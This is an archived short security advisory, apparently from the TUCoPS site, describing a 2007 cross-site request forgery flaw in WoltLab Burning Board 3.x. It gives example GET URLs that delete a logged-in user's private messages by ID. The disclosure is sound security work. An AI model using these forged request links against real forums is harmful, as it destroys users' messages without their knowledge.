TUCoPS :: Web BBS :: Frequently Exploited :: bx1653.htm

WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability
WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability
WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability


#############################################################################
WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerability
by NBBN.         Founded: 25 December 2007
#############################################################################


Examples:
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=[pmid] 
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=1 

Fix: 

Wait for a fix. Or never surf in other sites, if you have autologin on and 
don't click links, when you are logged in. 

Vulnerability Versions:

I tested it only on 3.0.1 but I think that all version of 3 are vuln.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH